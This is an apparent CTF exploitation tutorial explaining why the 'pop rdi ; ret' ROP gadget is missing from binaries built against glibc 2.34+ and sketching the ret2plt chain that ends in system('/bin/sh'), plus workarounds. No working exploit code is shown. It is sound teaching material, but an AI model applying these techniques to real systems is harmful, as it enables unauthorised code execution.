The problem
What happened to ROP?
Ah the classic overflow challenge. By now most people are familiar with this style of exploit, where you have some buffer on the stack, and you can provide more data than what's been allocated for it, leading to a classic overflow. And because it's so well known, so are the techniques for it. Take the simple program below.
It's obvious that we can overflow the buf
buffer, so from here we'd typically use the classic ret2plt attack, where we:
Use
puts
to leak a GOT entryReturn to
main
Call
system("/bin/sh")
First we're going to need to find the pop rdi ; ret
gadget, so let's run ROPgadget
.
Wait a second. Where's pop rdi ; ret
? It should be here somewhere right??? Well actually a lot of gadgets here are missing such as:
pop rdi ; ret
pop rsi ; pop r15 ; ret
pop rbp ; pop r12 ; pop r13 ; pop r14 ; pop r15 ; ret
So what's going on? Let's investigate, shall we?
Where does pop rdi ; ret
come from?
pop rdi ; ret
come from?Where did it come from, and where did it go? Where did it come from cotton eye joe?
To find this out, let's take a binary which has this gadget (which hasn't been stripped). There's plenty to choose from from countless CTFs, so I chose hackthebox's ropme
. Running ROPgadget
.
Let's see where this lies in the binary.
So it seems our beloved gadget belongs to a function called __libc_csu_init
.
Interestingly the function's disassembly doesn't seem to contain pop rdi ; ret
? That's because pop rdi ; ret
doesn't show up in regular code, but rather comes from splitting an instruction in half, specifically pop r15
. You may have noticed that we have __libc_csu_init+98
and __libc_csu_init+100
in the disassembly, but pop rdi ; ret
is at __libc_csu_init+99
.
Quirk of x86
The above is how these instructions get assembled. You can notice that pop r15 ; ret
is longer, but the last 2 bytes are the same as pop rdi ; ret
(for some reason). Due to how x86 instructions aren't fixed-length like ARM, we can execute an instruction from any point. So, we could take the address of pop r15 ; ret
, increment it by 1, and get pop rdi ; ret
.
So wherever there is a pop r15
, there will also be pop rdi
. And since __libc_csu_init
will always contain pop r15 ; ret
, binaries with __libc_csu_init
will have pop rdi ; ret
!
Where did pop rdi ; ret
go?
pop rdi ; ret
go?So if any binary containing __libc_csu_init
has the pop rdi
gadget, what's happening in the demo binary?
Aha! In the demo binary, __libc_csu_init
is not present! But why is that?
Well recently in glibc 2.34, there was a patch which stopped __libc_csu_init
being compiled into binaries. The patch was designed to remove useful ROP gadgets for ret2csu
, and has the effect of removing pop rdi ; ret
in binaries compiled against glibc 2.34+.
Side note on __libc_start_main
__libc_start_main
This would change a few things, such as __libc_start_main
, which took __libc_csu_init
as an argument, expecting it to be run. Now that it doesn't exist, it still takes the argument, but does nothing with it, so it had be versioned off for 2.34, as it now had different behaviour. This meant that you couldn't run binaries compiled for 2.34+ on older glibc versions, otherwise you'd get the very annoying error:
So you have this patch to thank for this :)
Sooo what now?
So has this completely killed ROP on modern binaries? Has our time spent practising and mastering the art of ROP all been for nothing, and we'll have to move on to other types of exploits entirely?
Woah slow down, I want to argue that it hasn't. While it has thrown a wrench in how we do ROP, there are still tricks we can do to get around this, which I will showcase in the following sections.
Other sources of pop rdi ; ret
pop rdi ; ret
For one thing, __libc_csu_init
isn't our only source of pop rdi ; ret
. Recall that wherever there's pop r15 ; ret
there is pop rdi ; ret
. But why does pop r15 ; ret
show up in __libc_csu_init
?
Well normally when we compile, the variables in a function are stored on the stack. But, if we compile using optimization flags (or use register
when defining a variable), some variables can be stored in registers instead. The registers typically used include rbp
, r12
, r13
, r14
, r15
, rbx
. For this to work, a function using these registers must push the old values of these registers before using them, and then restore them when returning. This is because other functions may also be using these registers, and so this function could clobber those registers for the other function(s). So, this involves pushing these to the stack at the start, then popping them at the end. If you look back at __libc_csu_init
's disassembly above, it follows this same pattern, because it's compiled with optimization.
This means that if your binary is compiled for optimization, there is a chance r15
is used for a variable, meaning it must also be pushed, and more importantly popped, which would result in pop r15
-> pop rdi
.
Unfortunately, from my testing, r15
seems to be one of the last ones that gets used, so a function would likely need many register variables for r15
to be used.
This is why glibc will always contain pop rdi
, because it's compiled for optimization, and there so many functions with lots of variables stored in registers, so it's basically guaranteed that r15
is used in at least one of them.
This means that once you have a libc leak, you'll always be able to find a pop rdi ; ret
gadget. However if all you have is an overflow, and no leak, then this will still cause problems.
Summary
So if your binary doesn't have pop rdi ; ret
, then you have a few approaches:
Get a libc leak using a different bug
Controlling
rdi
some other wayUse overflow to leak libc
In the following sections, I'll show some tricks you can use to do the latter 2 approaches :)
Last updated